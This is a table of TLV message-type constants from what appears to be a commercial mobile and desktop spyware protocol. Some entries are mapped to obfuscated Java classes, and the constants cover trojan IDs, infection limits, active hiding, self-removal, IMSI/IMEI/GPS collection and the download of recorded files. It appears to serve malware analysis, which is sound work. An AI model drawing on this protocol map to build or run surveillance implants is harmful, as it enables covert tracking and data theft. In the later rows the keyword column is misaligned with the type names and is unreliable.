353 3631 master agent configuration 7436448 TlvTypeMasterAgentConfigurationUpdateRequest
354 3631 master agent configuration 7436704 TlvTypeMasterAgentConfigurationUpdateRequestCompleted
355 3631 master agent configuration 7436944 TlvTypeMasterAgentConfiguration
356 3631 master agent configuration 7437216 TlvTypeMasterAgentConfigurationValue
357 3631 master agent configuration 7437424 TlvTypeMasterAgentConfigurationValueName
358 3631 master agent configuration 7437568 TlvTypeMasterAgentConfigurationValueData
359 3631 master agent configuration 7437984 TlvTypeMasterAgentConfigurationTransferDone
360 3632 master agent 7438496 TlvTypeMasterAgentRetrieveTargetFile
361 3632 master agent 7438752 TlvTypeMasterAgentRetrieveTargetFileAnswer
362 3632 master agent 7438912 TlvTypeMasterAgentAlarmEntryID
363 3632 master agent 7439168 TlvTypeMasterAgentAlarmEntryVersion
364 3632 master agent 7439424 TlvTypeMasterAgentAlarmTriggerFlags
365 3632 master agent 7439776 TlvTypeMasterAgentGetAlarmList
366 3632 master agent 7440032 TlvTypeMasterAgentAddAlarmEntry
367 3632 master agent 7440288 TlvTypeMasterAgentRemoveAlarmEntry
368 3633 master agent 7440544 TlvTypeMasterAgentAlarmEntry
369 3633 master agent 7440800 TlvTypeMasterAgentSystemStatus
370 3633 master agent 7441056 TlvTypeMasterAgentSystemStatusRequest
371 3633 master agent 7441312 TlvTypeMasterAgentSystemStatusReply
372 3633 master agent 7441552 TlvTypeMasterAgentLicenseValues
373 3633 master agent 7441824 TlvTypeMasterAgentLicenseValuesRequest
374 3633 master agent 7442080 TlvTypeMasterAgentLicenseValuesReply
375 3634 master agent 7442592 TlvTypeMasterAgentGetNetworkConfigurationRequest
376 3634 master agent 7442848 TlvTypeMasterAgentSetNetworkConfigurationRequest
377 3634 master agent 7443104 TlvTypeMasterAgentSetNetworkConfigurationReply
378 3634 master agent 7443360 TlvTypeMasterAgentRetrieveAllowedModulesList
379 3634 master agent 7443616 TlvTypeMasterAgentRetrieveAllowedModulesListAnswer
380 3636 master agent 7446688 TlvTypeMasterAgentRemoveAllTargetData
381 3636 master agent 7446944 TlvTypeMasterAgentForceDownloadRecordedData
382 3636 master agent 7447200 TlvTypeMasterAgentTargetCreateNotification
383 3636 master agent 7447456 TlvTypeMasterAgentMobileTargetInfoReply
384 3636 master agent 7447696 TlvTypeMasterAgentMobileTargetInfoValues
385 3638 master agent alert 7450784 TlvTypeMasterAgentAlert
386 3640 master agent 7454880 TlvTypeMasterAgentAddUser
387 3640 master agent 7455392 TlvTypeMasterAgentAddUserReply
388 3640 master agent 7455648 TlvTypeMasterAgentModifyUser
389 3640 master agent 7455904 TlvTypeMasterAgentSetUserPermission
390 3640 master agent 7456160 TlvTypeMasterAgentSetTargetPermission
391 3640 master agent 7456400 TlvTypeMasterAgentUserPermission
392 3640 master agent 7456656 TlvTypeMasterAgentTargetPermission
393 3641 master agent 7456928 TlvTypeMasterAgentUserPermissionValuePacket
394 3641 master agent 7457184 TlvTypeMasterAgentTargetPermissionValuePacket
395 3641 master agent 7457344 TlvTypeMasterAgentUserPermissionValueName
396 3641 master agent 7457600 TlvTypeMasterAgentTargetPermissionValueName
397 3641 master agent 7457856 TlvTypeMasterAgentUserPermissionValueData
398 3641 master agent 7458112 TlvTypeMasterAgentTargetPermissionValueData
399 3641 master agent 7458464 TlvTypeMasterAgentModifyPassword
400 3641 master agent 7458656 TlvTypeMasterAgentMobileTargetPermissionValueName
401 3642 master agent 7458976 TlvTypeMasterAgentUploadFile
402 3642 master agent 7459232 TlvTypeMasterAgentUploadFileChunk
403 3642 master agent 7459488 TlvTypeMasterAgentUploadFileDone
404 3642 master agent 7459744 TlvTypeMasterAgentUploadFilesTransferDone
405 3642 master agent 7460000 TlvTypeMasterAgentGetTargetModuleConfigRequest
406 3642 master agent 7460256 TlvTypeMasterAgentRemoveFile
407 3642 master agent 7460512 TlvTypeMasterAgentMobileProxyList
408 3642 master agent 7460768 TlvTypeMasterAgentSMSProxyList
409 3643 master agent 7461024 TlvTypeMasterAgentSMSProxyInfoReply
410 3643 master agent 7461280 TlvTypeMasterAgentCallPhoneNumberList
411 3643 master agent 7461536 TlvTypeMasterAgentCallPhoneNumberInfoReply
412 3643 master agent 7461792 TlvTypeMasterAgentGetMobileTargetModuleConfigRequest
413 3643 master agent 7462048 TlvTypeMasterAgentSendSMS
414 3647 master agent 7469984 TlvTypeMasterAgentEncryptionRequired
415 3647 master agent 7470240 TlvTypeMasterAgentFileCompleted
416 3647 master agent 7470496 TlvTypeMasterAgentRequestCompleted
417 3647 master agent 7470752 TlvTypeAgentMasterComm
418 3647 master agent 7471008 TlvTypeMasterAgentRequestStatus
419 3648 master 7471424 TlvTypeProxyMasterCommSig
420 3648 master 7471520 TlvTypeMasterTargetConn
421 3648 master 7471776 TlvTypeProxyMasterComm
422 3648 master 7472032 TlvTypeMasterProxyComm
423 3648 master 7472288 TlvTypeProxyMasterHeartBeatAnswer
424 3648 master 7472544 TlvTypeProxyMasterDisconnect
425 3648 master 7472704 TlvTypeProxyMasterNotification
426 3648 master 7473056 TlvTypeProxyMasterRequest
427 3649 master 7473312 TlvTypeMasterProxyCommNotification
428 3649 master 7473568 TlvTypeMasterCheckTargetDisconnect
429 3680 target proxy 7536960 TlvTypeProxyTargetCommSig
430 3680 target proxy 7537312 TlvTypeProxyTargetComm
431 3680 target proxy 7537568 TlvTypeProxyMasterTargetComm
432 3680 target proxy 7537728 TlvTypeProxyTargetRequestCrypto
433 3680 target proxy 7538064 TlvTypeProxyTargetAnswerCrypto
434 3744 target 7668128 TlvTypeMasterTargetComm
435 3744 target 7668384 TlvTypeTargetCloseAllLiveStreaming
436 3776 relay 7733664 TlvTypeRelayProxyComm
437 3776 relay 7734176 TlvTypeRelayDummyHeartbeat
438 4032 test type meta 8257792 TlvTypeTestMetaTypeInvalid
439 4032 test type meta 8258608 TlvTypeTestMetaTypeBool
440 4032 test type meta 8258880 TlvTypeTestMetaTypeUInt
441 4032 test type meta 8259152 TlvTypeTestMetaTypeInt
442 4032 test type meta 8259440 TlvTypeTestMetaTypeString
443 4033 test 8259712 TlvTypeTestMetaTypeUnicode
444 4033 test 8259984 TlvTypeTestMetaTypeRaw
445 4033 test 8260256 TlvTypeTestMetaTypeGroup
446 4033 test 8260416 TlvTypeTestMemberIdentifier
447 4033 test 8260736 TlvTypeTestMemberName
448 4096 target 8389008 TlvTypeTargetData
449 4096 target 8389280 TlvTypeTargetHeartBeat
450 4096 target 8389680 TlvTypeTargetKeepSessionAlive
451 4096 target 8390000 TlvTypeTargetLocalIP
452 4096 target 8390256 TlvTypeTargetGlobalIP
453 4096 target 8390448 TlvTypeTargetState
454 4097 agent master 8390784 TlvTypeTargetID
455 4097 agent master 8391072 TlvTypeGetInstalledModulesRequest
456 4097 agent master 8391328 TlvTypeInstalledModulesReply
457 4097 agent master 8391488 TlvTypeTrojanUID
458 4097 agent master 8391808 TlvTypeTrojanID
459 4097 agent master 8392000 TlvTypeTrojanMaxInfections Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
460 4097 agent master 8392240 TlvTypeScreenSaverOn
461 4097 agent master 8392496 TlvTypeScreenLocked
462 4098 agent master 8392752 TlvTypeRecordedDataAvailable
463 4098 agent master 8393024 TlvTypeDownloadedRecordedDataTimeStamp
464 4098 agent master 8393280 TlvTypeInstallationMode
465 4098 agent master 8393552 TlvTypeTargetRemoveNotification
466 4098 agent master 8393792 TlvTypeTargetPlatformBits
467 4098 agent master 8394032 TlvTypeRemoveItselfMaxInfectionReached
468 4098 agent master 8394288 TlvTypeRemoveItselfAtMasterRequest
469 4098 agent master 8394544 TlvTypeRemoveItselfAtAgentRequest
470 4099 agent master 8394912 TlvTypeRemoveItselfAtAgentReqRequest
471 4099 agent master 8395072 TlvTypeRecordedFilesDownloadTotal
472 4099 agent master 8395328 TlvTypeRecordedFilesDownloadProgress
473 4099 agent master 8395632 TlvTypeTargetLicenseInfo
474 4099 agent master 8395840 TlvTypeRemoveTargetLicenseInfo
475 4099 agent master 8396176 TlvTypeTargetAllConfigurations
476 4100 target error 8396960 TlvTypeTargetError
477 4102 target config 8401056 TlvTypeGetTargetConfigRequest
478 4102 target config 8401312 TlvTypeTargetConfigReply
479 4102 target config 8401568 TlvTypeSetTargetConfigRequest
480 4102 target config 8402304 TlvTypeConfigTargetID
481 4102 target config 8402496 TlvTypeConfigTargetHeartbeatInterval
482 4102 target config 8402800 TlvTypeConfigTargetProxy Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
483 4103 agent master 8403008 TlvTypeConfigTargetPort Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
484 4103 agent master 8403584 TlvTypeConfigAutoRemovalDateTime
485 4103 agent master 8403776 TlvTypeConfigAutoRemovalIfNoProxy Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
486 4103 agent master 8404032 TlvTypeInternalAutoRemovalElapsedTime
487 4104 active hiding config 8405040 TlvTypeConfigActiveHiding
488 4106 target module 8409248 TlvTypeTargetLoadModuleRequest
489 4106 target module 8409504 TlvTypeTargetLoadModuleReply
490 4106 target module 8409760 TlvTypeTargetUnLoadModuleRequest
491 4106 target module 8410016 TlvTypeTargetUnLoadModuleReply
492 4106 target module 8410272 TlvTypeTargetUploadModuleRequest
493 4106 target module 8410528 TlvTypeTargetUploadModuleReply
494 4106 target module 8410784 TlvTypeTargetUploadModuleChunk
495 4106 target module 8411040 TlvTypeTargetUploadModuleDoneRequest
496 4107 target module 8411296 TlvTypeTargetUploadModuleDoneReply
497 4107 target module 8411552 TlvTypeTargetRemoveModuleRequest
498 4107 target module 8411808 TlvTypeTargetRemoveModuleReply
499 4107 target module 8412064 TlvTypeTargetOfflineUploadModuleRequest
500 4107 target module 8412320 TlvTypeTargetOfflineUploadModuleReply
501 4107 target module 8412576 TlvTypeTargetOfflineUploadModuleChunk
502 4107 target module 8412832 TlvTypeTargetOfflineUploadModuleDoneRequest
503 4107 target module 8413088 TlvTypeTargetOfflineUploadModuleDoneReply
504 4108 target error 8413344 TlvTypeTargetOfflineError
505 4108 target error 8413600 TlvTypeTargetUploadError
506 4109 files reply master list agent mc 8415392 TlvTypeMasterAgentListMCFilesReply
507 4110 target recorded 8417440 TlvTypeTargetGetRecordedFilesRequest
508 4110 target recorded 8417696 TlvTypeTargetRecordedFilesReply
509 4110 target recorded 8417952 TlvTypeTargetRecordedFileDownloadRequest
510 4110 target recorded 8418208 TlvTypeTargetRecordedFileDownloadReply
511 4110 target recorded 8418464 TlvTypeTargetRecordedFileDownloadChunk
512 4110 target recorded 8418720 TlvTypeTargetRecordedFileDownloadCompleted
513 4110 target recorded 8418976 TlvTypeTargetRecordedFileDeleteRequest
514 4110 target recorded 8419232 TlvTypeTargetRecordedFileDeleteReply
515 4111 target recorded ex 8419488 TlvTypeTargetGetRecordedFilesRequestEx
516 4111 target recorded ex 8419744 TlvTypeTargetRecordedFilesReplyEx
517 4111 target recorded ex 8420000 TlvTypeTargetRecordedFileDeleteRequestEx
518 4111 target recorded ex 8420256 TlvTypeTargetRecordedFilesDownloadRequestEx
519 4128 data 8454544 TlvTypeProxyData
520 4128 data 8454800 TlvTypeRelayData
521 4130 proxy 8458400 TlvTypeProxyTargetDisconnect
522 4130 proxy 8458656 TlvTypeProxyMobileTargetDisconnect
523 4130 proxy 8458912 TlvTypeProxyDummyHeartbeat
524 4130 proxy 8459168 TlvTypeProxyMobileDummyHeartbeat
525 4160 master 8520080 TlvTypeMasterData
526 4160 master 8520768 TlvTypeMasterMode
527 4160 master 8521024 TlvTypeMasterToken
528 4160 master 8521344 TlvTypeMasterQueryResult
529 4161 string master alarm 8522368 TlvTypeMasterAlarmString
530 4192 agent 8585616 TlvTypeAgentData
531 4192 agent 8585808 TlvTypeAgentQueryID
532 4192 agent 8586048 TlvTypeAgentQueryModSubmodID
533 4192 agent 8586304 TlvTypeAgentQueryFromDate
534 4192 agent 8586560 TlvTypeAgentQueryToDate
535 4192 agent 8586816 TlvTypeAgentQuerySortOrder
536 4192 agent 8587136 TlvTypeAgentQueryValueFilter
537 4193 uid agent 8587328 TlvTypeAgentUID
538 4224 mobile 8651152 TlvTypeMobileTargetData
539 4224 mobile 8651376 TlvTypeMobileTargetHeartBeatV10 Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/o/g
540 4224 mobile 8651632 TlvTypeMobileTargetExtendedHeartBeatV10 Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/q/b
541 4224 mobile 8651888 TlvTypeMobileHeartBeatReplyV10 Lorg/xmlpush/v3/o/h$b, Lorg/xmlpush/v3/o/l$2, L/org/xmlpush/v3/q/a, L/org/xmlpush/v3/q/c
542 4225 installed reply modules mobile 8653472 TlvTypeMobileInstalledModulesReply
543 4225 installed reply modules mobile 8652912 × unknown Lorg/xmlpush/v3/o/l$2
544 4226 module upload mobile target 8655008 TlvTypeMobileTargetOfflineUploadModuleRequest L/org/xmlpush/v3/o/h
545 4226 module upload mobile target 8656032 TlvTypeMobileTargetUploadModuleRequest
546 4226 module upload mobile target 8656288 TlvTypeMobileTargetUploadModuleReply
547 4226 module upload mobile target 8656544 TlvTypeMobileTargetUploadModuleChunk
548 4226 module upload mobile target 8656800 TlvTypeMobileTargetUploadModuleDoneRequest
549 4227 target mobile 8657056 TlvTypeMobileTargetUploadModuleDoneReply
550 4227 target mobile 8657312 TlvTypeMobileTargetRemoveModuleRequest
551 4227 target mobile 8657568 TlvTypeMobileTargetRemoveModuleReply
552 4227 target mobile 8657824 TlvTypeMobileTargetOfflineUploadModuleReply Lorg/xmlpush/v3/o/j
553 4227 target mobile 8658080 TlvTypeMobileTargetOfflineUploadModuleChunk L/org/xmlpush/v3/o/h
554 4227 target mobile 8658336 TlvTypeMobileTargetOfflineUploadModuleDoneRequest L/org/xmlpush/v3/o/h
555 4227 target mobile 8658592 TlvTypeMobileTargetOfflineUploadModuleDoneReply Lorg/xmlpush/v3/o/j
556 4227 target mobile 8658848 TlvTypeMobileTargetOfflineError
557 4228 mobile target 8659104 TlvTypeMobileTargetError
558 4228 mobile target 8659360 TlvTypeMobileTargetGetRecordedFilesRequest L/org/xmlpush/v3/o/h
559 4228 mobile target 8659616 TlvTypeMobileTargetRecordedFilesReply Lorg/xmlpush/v3/o/d
560 4228 mobile target 8659872 TlvTypeMobileTargetRecordedFileDownloadRequest L/org/xmlpush/v3/o/h
561 4228 mobile target 8660128 TlvTypeMobileTargetRecordedFileDownloadReply Lorg/xmlpush/v3/o/d
562 4228 mobile target 8660384 TlvTypeMobileTargetRecordedFileDownloadChunk Lorg/xmlpush/v3/o/d
563 4228 mobile target 8660640 TlvTypeMobileTargetRecordedFileDownloadCompleted Lorg/xmlpush/v3/o/d
564 4228 mobile target 8660896 TlvTypeMobileTargetRecordedFileDeleteRequest L/org/xmlpush/v3/o/h
565 4229 target reply delete mobile recorded file 8661152 TlvTypeMobileTargetRecordedFileDeleteReply
566 4230 mobile config target 8663968 TlvTypeMobileTargetOfflineConfig Lorg/xmlpush/v3/q/c
567 4230 mobile config target 8664224 TlvTypeMobileTargetEmergencyConfigAsTLV
568 4230 mobile config target 8664432 TlvTypeMobileTargetEmergencyConfig L/org/xmlpush/v3/q/a, L/org/xmlpush/v3/q/c
569 4234 load module mobile target 8671392 TlvTypeMobileTargetLoadModuleRequest
570 4234 load module mobile target 8671648 TlvTypeMobileTargetLoadModuleReply
571 4234 load module mobile target 8671904 TlvTypeMobileTargetUnLoadModuleRequest
572 4234 load module mobile target 8672160 TlvTypeMobileTargetUnLoadModuleReply
573 4236 target error 8675472 TlvTypeMobileTargetHeartbeatEvents Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
574 4236 agent master files mc reply list 8675648 TlvTypeMobileTargetHeartbeatInterval Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
575 4236 recorded target 8675984 TlvTypeMobileTargetHeartbeatRestrictions Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
576 4236 recorded target 8676208 TlvTypeConfigSMSPhoneNumber Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
577 4236 recorded target 8676496 TlvTypeMobileTargetPositioning Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
578 4236 recorded target 8676672 TlvTypeMobileTrojanUID Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/h/c, Lorg/xmlpush/v3/i/a, L/org/xmlpush/v3/h/c
579 4236 recorded target 8676976 TlvTypeMobileTrojanID Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
580 4236 recorded target 8677296 TlvTypeMobileTargetLocationChangedRange Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
581 4237 config 8677440 TlvTypeConfigMobileAutoRemovalDateTime Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
582 4237 config 8677808 TlvTypeConfigOverwriteProxyAndPhones
583 4237 config 8678000 TlvTypeConfigCallPhoneNumber Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
584 4238 ex recorded target 8679488 TlvTypeLocationAreaCode Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
585 4238 ex recorded target 8679744 TlvTypeCellID Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
586 4238 ex recorded target 8680048 TlvTypeMobileCountryCode Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
587 4238 data 8680304 TlvTypeMobileNetworkCode Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
588 4238 data 8680560 TlvTypeIMSI
589 4238 proxy 8680816 TlvTypeIMEI
590 4238 proxy 8681072 TlvTypeGPSLatitude
591 4238 proxy 8681328 TlvTypeGPSLongitude
592 4239 proxy 8681520 TlvTypeFirstHeartbeat
593 4239 master 8681872 TlvTypeInstalledModules Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
594 4240 gps valid values 8683568 TlvTypeValidGPSValues
595 4288 mobile proxy comm target 8782176 TlvTypeProxyMobileTargetCommSig
596 4288 mobile proxy comm target 8782496 TlvTypeProxyMobileTargetComm
597 4288 mobile proxy comm target 8782752 TlvTypeProxyMasterMobileTargetComm
598 4384 master mobile 8978752 TlvTypeMobileProxyMasterCommSig
599 4384 master mobile 8978848 TlvTypeMasterMobileTargetConn
600 4384 master mobile 8979104 TlvTypeMobileProxyMasterComm
601 4384 master mobile 8979360 TlvTypeMobileMasterProxyComm
602 4384 master mobile 8979616 TlvTypeProxyMasterMobileHeartBeatAnswer Lorg/xmlpush/v3/o/l$2, L/org/xmlpush/v3/o/h
603 4384 master mobile 8979872 TlvTypeMobileMasterProxyCommNotification
604 8128 agent 16646544 TlvTypePlaintext
605 8128 agent uid 16646800 TlvTypeCompression
606 8128 mobile 16647056 TlvTypeEncryption Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
607 8128 mobile 16647232 TlvTypeTargetUID
608 8128 mobile 16647536 TlvTypeIPAddress Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n
609 8128 mobile 16647808 TlvTypeUserName
610 8128 installed reply modules mobile 16648064 TlvTypeComputerName
611 8129 installed reply modules mobile 16648304 TlvTypeLoginName
612 8129 module upload mobile target 16648560 TlvTypePassphrase
613 8129 module upload mobile target 16648832 TlvTypeRecordID
614 8129 module upload mobile target 16649088 TlvTypeOwner
615 8129 module upload mobile target 16649344 TlvTypeMetaData
616 8129 module upload mobile target 16649536 TlvTypeModuleID Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
617 8129 mobile target 16649856 TlvTypeOSName
618 8129 mobile target 16650048 TlvTypeModuleSubID Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
619 8130 mobile target 16650320 TlvTypeErrorCode
620 8130 mobile target 16650560 TlvTypeOffset
621 8130 mobile target 16650816 TlvTypeLength
622 8130 mobile target 16651088 TlvTypeRequestID Lorg/xmlpush/v3/w, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/j, Lorg/xmlpush/v3/o/j, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/b, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
623 8130 mobile target 16651328 TlvTypeRequestType
624 8130 mobile target 16651584 TlvTypeVersion Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
625 8130 mobile target 16651840 TlvTypeMachineID
626 8130 mobile target 16652096 TlvTypeMajorNumber
627 8131 mobile target 16652352 TlvTypeMinorNumber
628 8131 mobile target 16652656 TlvTypeGlobalIPAddress
629 8131 mobile target 16652912 TlvTypeASCII_Filename
630 8131 mobile target 16653120 TlvTypeFilesize
631 8131 mobile target 16653392 TlvTypeFilecount
632 8131 mobile target 16653712 TlvTypeFiledata
633 8131 target reply recorded delete file mobile 16653968 TlvTypeMD5Sum
634 8131 mobile target config 16654144 TlvTypeProxyPort
635 8132 mobile target config 16654400 TlvTypeStatus
636 8132 mobile target config 16654656 TlvTypeUserID Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
637 8132 module load mobile target 16654912 TlvTypeGroupID
638 8132 module load mobile target 16655168 TlvTypePermissions
639 8132 module load mobile target 16655424 TlvTypeRequestCode
640 8132 module load mobile target 16655680 TlvTypeDataSize
641 8132 16655936 TlvTypeKeyType
642 8132 16656240 TlvTypeEmail
643 8133 16656432 TlvTypeEnabled
644 8133 16656688 TlvTypeLicensed
645 8133 16656960 TlvTypeAudioFrequency Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n
646 8133 16657216 TlvTypeAudioBitsPerSample Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n
647 8133 16657472 TlvTypeAudioChannels Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n
648 8133 16657728 TlvTypeStartTime
649 8133 config 16657984 TlvTypeStopTime
650 8133 config 16658240 TlvTypeBitMask
651 8134 config 16658560 TlvTypeTimeZone Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
652 8134 16658816 TlvTypeDateTime Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b
653 8134 16659072 TlvTypeStartSessionDateTime Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
654 8134 16659328 TlvTypeStopSessionDateTime Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/n
655 8134 16659520 TlvTypeDateTimeRef L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
656 8134 16659776 TlvTypeScheduleRepeat L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
657 8134 16660032 TlvTypeUnixMasterDateTime
658 8134 16660288 TlvTypeUnixUTCDateTime
659 8135 16660544 TlvTypeDurationInSeconds Lorg/xmlpush/v3/f/b
660 8135 16660864 TlvTypeMasterRefTime
661 8135 16661120 TlvTypeMasterRefTimeStart
662 8135 values gps valid 16661376 TlvTypeMasterRefTimeEnd
663 8135 16661568 TlvTypeCounter Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
664 8135 16661888 TlvTypeWhiteListEntry type: byte array
665 8135 16662144 TlvTypeBlackListEntry type: array
666 8135 16662336 TlvTypeBlackWhiteListingMode
667 8136 config 16662576 TlvTypeConfigEnabled
668 8136 config 16662848 TlvTypeConfigMaxRecordingSize
669 8136 config 16663104 TlvTypeConfigAudioQuality Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n, L/org/xmlpush/v3/h/c
670 8136 config 16663344 TlvTypeConfigVideoBlackAndWhite Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c
671 8136 config 16663616 TlvTypeConfigVideoResolution L/org/xmlpush/v3/h/c
672 8136 config 16663872 TlvTypeConfigCaptureFrequency Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c
673 8136 config 16664128 TlvTypeConfigVideoQuality Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c
674 8136 config 16664384 TlvTypeConfigFilesStandardFilter
675 8137 config 16664704 TlvTypeConfigFilesCustomFilter
676 8137 config 16664896 TlvTypeConfigStandardLocation
677 8137 config 16665216 TlvTypeConfigCustomLocation
678 8137 config 16665408 TlvTypeConfigFileChunkSize
679 8137 config 16665664 TlvTypeConfigFileTransferSpeed
680 8137 config 16665904 TlvTypeConfigUploadFileOverwrite
681 8137 config 16666160 TlvTypeConfigDeleteOverReboot
682 8137 config 16666496 TlvTypeConfigCustomLocationException
683 8138 master mobile 16666752 TlvTypeExtraData
684 8138 master mobile 16667008 TlvTypeSignature
685 8138 16667264 TlvTypeComments
